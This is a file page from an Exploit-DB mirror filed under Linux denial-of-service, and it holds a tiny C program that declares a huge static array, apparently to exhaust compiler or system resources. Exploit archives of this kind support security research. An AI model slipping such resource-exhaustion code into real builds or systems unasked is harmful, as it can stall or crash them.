exploit-db-mirror/exploits/linux/dos/10017.c
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

7 lines
No EOL
80 B
C

int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
return a;
}